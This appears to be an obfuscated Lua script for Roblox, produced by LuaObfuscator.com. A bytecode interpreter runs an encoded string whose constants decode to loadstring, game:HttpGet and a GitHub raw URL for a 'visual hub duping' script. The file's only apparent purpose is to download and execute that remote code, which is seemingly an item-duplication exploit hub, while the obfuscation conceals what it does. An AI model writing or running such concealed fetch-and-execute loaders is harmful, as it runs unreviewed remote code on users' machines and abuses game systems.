--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v97=0;local v98;while true do if (1==v97) then return v98;end if (v97==0) then v98=v5(v71,v19);v19=nil;v97=1;end end else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=(v31/((570 -(367 + 201))^(v32-(2 -1))))%((1067 -(68 + 997))^(((v33-((1272 -(226 + 1044)) -1)) -(v32-(1 -(0 -0)))) + 1)) ;return v72-(v72%((118 -(32 + 85)) + 0)) ;else local v73=(4 -(2 + 0))^(v32-((364 + 1274) -(1523 + 114))) ;return (((v31%(v73 + v73))>=v73) and (620 -(555 + 64))) or (931 -(857 + 74)) ;end end local function v21()local v34=0;local v35;while true do if (v34==(957 -((1242 -(87 + 263)) + 65))) then v35=v1(v16,v18,v18);v18=v18 + (2 -(181 -(67 + 113))) ;v34=1 -0 ;end if (v34==(1 -0)) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;return (v37 * (189 + 67)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + ((1008 -(915 + 82)) -8) );v18=v18 + (956 -(802 + 150)) ;return (v41 * (45169940 -28392724)) + (v40 * (118879 -53343)) + (v39 * (187 + 69)) + v38 ;end local function v24()local v42=0 -(0 -0) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==2) then v47=v20(v44,18 + 1 + 2 ,19 + 12 );v48=((v20(v44,41 -(8 + 1) )==(1188 -(1069 + 118))) and  -((1056 -(87 + 968)) + 0)) or (2 -1) ;v42=6 -3 ;end if (v42==(859 -((3583 -2769) + 45))) then v43=v23();v44=v23();v42=1 + 0 ;end if (v42==(4 -(1 + 0))) then if (v47==((0 -0) + (1413 -(447 + 966)))) then if (v46==(791 -(368 + 423))) then return v48 * (0 -0) ;else local v99=0 -0 ;while true do if (v99==(18 -(10 + 8))) then v47=1081 -(1020 + 60) ;v45=1423 -((1724 -1094) + 793) ;break;end end end elseif (v47==(6936 -4889)) then return ((v46==(1817 -(1703 + 114))) and (v48 * ((3 -2)/0))) or (v48 * NaN) ;end return v8(v48,v47-(4843 -3820) ) * (v45 + (v46/((444 -(416 + 26))^(165 -113)))) ;end if (v42==((704 -(376 + 325)) -2)) then v45=1748 -((1245 -485) + 987) ;v46=(v20(v44,1 + 0 ,35 -(45 -30) ) * ((440 -(145 + 293))^(462 -(44 + 386)))) + v43 ;v42=1488 -(998 + 488) ;end end end local function v25(v49)local v50;if  not v49 then local v74=0;while true do if (v74==(0 + 0)) then v49=v23();if (v49==0) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v67=2 -1 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=(0 -0)) then else local v75=0;while true do if (0~=v75) then else v53=0 -0 ;v54=nil;v75=604 -(268 + 335) ;end if (v75==1) then v52=1;break;end end end if (v52~=(293 -(60 + 230))) then else v59=nil;while true do local v80=0;while true do if (v80~=(572 -(426 + 146))) then else if (v53~=(1 + 0)) then else local v106=1456 -(282 + 1174) ;local v107;while true do if (v106~=(811 -(569 + 242))) then else v107=0;while true do if ((2 -1)~=v107) then else local v142=0;while true do if (v142==(1 + 0)) then v107=2;break;end if (v142==0) then for v162=1025 -(706 + 318) ,v58 do local v163=0;local v164;local v165;while true do if (v163==(1251 -(721 + 530))) then local v170=0;local v171;while true do if (v170==(1271 -(945 + 326))) then v171=0 -0 ;while true do if (v171==1) then v163=1;break;end if (v171~=0) then else local v178=0;while true do if (v178==0) then v164=v21();v165=nil;v178=1;end if (v178~=1) then else v171=1;break;end end end end break;end end end if (v163==1) then if (v164==(1 + 0)) then v165=v21()~=(700 -(271 + 429)) ;elseif (v164==(2 + 0)) then v165=v24();elseif (v164~=(1503 -(1408 + 92))) then else v165=v25();end v59[v162]=v165;break;end end end v57[3]=v21();v142=1;end end end if (v107~=(1086 -(461 + 625))) then else v58=v23();v59={};v107=1289 -(993 + 295) ;end if ((1 + 1)==v107) then v53=1173 -(418 + 753) ;break;end end break;end end end if (v53==2) then for v109=1 + 0 ,v23() do local v110=0;local v111;while true do if (v110==0) then v111=v21();if (v20(v111,1 + 0 ,1)==0) then local v143=0;local v144;local v145;local v146;local v147;while true do if (v143~=(0 + 0)) then else local v155=0 + 0 ;while true do if ((530 -(406 + 123))==v155) then v143=1;break;end if (v155~=(1769 -(1749 + 20))) then else v144=0;v145=nil;v155=1;end end end if (v143~=(1 + 0)) then else local v156=0;while true do if (v156==(1322 -(1249 + 73))) then v146=nil;v147=nil;v156=1;end if (v156~=1) then else v143=1 + 1 ;break;end end end if (v143==(1147 -(466 + 679))) then while true do if (1~=v144) then else local v166=0;while true do if (v166==(0 -0)) then v147={v22(),v22(),nil,nil};if (v145==0) then local v175=0 -0 ;local v176;while true do if (v175~=(0 -0)) then else v176=114 -(4 + 110) ;while true do if (0~=v176) then else v147[3]=v22();v147[588 -(57 + 527) ]=v22();break;end end break;end end elseif (v145==1) then v147[3]=v23();elseif (v145==(1429 -(41 + 1386))) then v147[3]=v23() -(2^(119 -(17 + 86))) ;elseif (v145==(3 + 0)) then local v183=0;local v184;local v185;local v186;while true do if (v183~=(1 -0)) then else v186=nil;while true do if (v184~=1) then else while true do if (v185~=0) then else v186=0;while true do if (v186~=0) then else v147[8 -5 ]=v23() -(2^(182 -(122 + 44))) ;v147[6 -2 ]=v22();break;end end break;end end break;end if (0==v184) then local v191=0 -0 ;while true do if (1~=v191) then else v184=1;break;end if (v191~=0) then else v185=0 + 0 ;v186=nil;v191=1;end end end end break;end if (v183~=0) then else v184=0;v185=nil;v183=1;end end end v166=1;end if (v166==1) then v144=2;break;end end end if (v144~=(0 + 0)) then else v145=v20(v111,3 -1 ,68 -(30 + 35) );v146=v20(v111,3 + 1 ,6);v144=1;end if (v144==(1259 -(1043 + 214))) then local v167=0 -0 ;local v168;while true do if (v167==(1212 -(323 + 889))) then v168=0 -0 ;while true do if ((581 -(361 + 219))==v168) then v144=323 -(53 + 267) ;break;end if (v168~=(0 + 0)) then else local v177=0;while true do if (v177~=0) then else if (v20(v146,1,414 -(15 + 398) )~=(983 -(18 + 964))) then else v147[7 -5 ]=v59[v147[2]];end if (v20(v146,2 + 0 ,2)~=(1 + 0)) then else v147[853 -(20 + 830) ]=v59[v147[3 + 0 ]];end v177=1;end if (v177~=(127 -(116 + 10))) then else v168=1;break;end end end end break;end end end if (v144==(1 + 2)) then if (v20(v146,3,3)~=(739 -(542 + 196))) then else v147[4]=v59[v147[8 -4 ]];end v54[v109]=v147;break;end end break;end end end break;end end end for v112=1 + 0 ,v23() do v55[v112-(1 + 0) ]=v28();end return v57;end v80=1 + 0 ;end if (v80~=1) then else if (v53~=(0 -0)) then else local v108=0 -0 ;while true do if (v108~=0) then else v54={};v55={};v108=1552 -(1126 + 425) ;end if (v108~=(407 -(118 + 287))) then else v53=1;break;end if (v108==(3 -2)) then v56={};v57={v54,v55,nil,v56};v108=9 -7 ;end end end break;end end end break;end if (v52==(1 + 0)) then local v76=0;while true do if (v76~=(978 -(553 + 424))) then else v52=2;break;end if (v76~=0) then else v55=nil;v56=nil;v76=1 -0 ;end end end if (v52~=(2 + 0)) then else v57=nil;v58=nil;v52=3 + 0 ;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v81=v64;local v82=v65;local v83=v66;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v96=0;while true do if (v96==0) then v93=v81[v85];v94=v93[1];v96=1;end if (v96==1) then if (v94<=3) then if (v94<=1) then if (v94>0) then v91[v93[2]]();else local v114=v93[2];local v115=v91[v93[3]];v91[v114 + 1 ]=v115;v91[v114]=v115[v93[4]];end elseif (v94==2) then v91[v93[2]]=v62[v93[3]];else local v121;local v122,v123;local v124;local v125;v91[v93[2]]=v62[v93[3]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v62[v93[3]];v85=v85 + 1 ;v93=v81[v85];v125=v93[2];v124=v91[v93[3]];v91[v125 + 1 ]=v124;v91[v125]=v124[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3]~=0 ;v85=v85 + 1 ;v93=v81[v85];v125=v93[2];v122,v123=v84(v91[v125](v13(v91,v125 + 1 ,v93[3])));v86=(v123 + v125) -1 ;v121=0;for v148=v125,v86 do local v149=0;while true do if (v149==0) then v121=v121 + 1 ;v91[v148]=v122[v121];break;end end end v85=v85 + 1 ;v93=v81[v85];v125=v93[2];v91[v125]=v91[v125](v13(v91,v125 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];do return;end end elseif (v94<=5) then if (v94==4) then v91[v93[2]]=v93[3];else do return;end end elseif (v94<=6) then local v137=0;local v138;local v139;local v140;local v141;while true do if (v137==1) then v86=(v140 + v138) -1 ;v141=0;v137=2;end if (v137==2) then for v159=v138,v86 do v141=v141 + 1 ;v91[v159]=v139[v141];end break;end if (v137==0) then v138=v93[2];v139,v140=v84(v91[v138](v13(v91,v138 + 1 ,v93[3])));v137=1;end end elseif (v94==7) then local v150=v93[2];v91[v150]=v91[v150](v13(v91,v150 + 1 ,v86));else v91[v93[2]]=v93[3]~=0 ;end v85=v85 + 1 ;break;end end end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574035E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F66722O657663612O63666F72796F752F76697375616C2D6875622D647570696E672F6D61696E2F76697375616C253230687562253230647570696E6700093O0012033O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);end
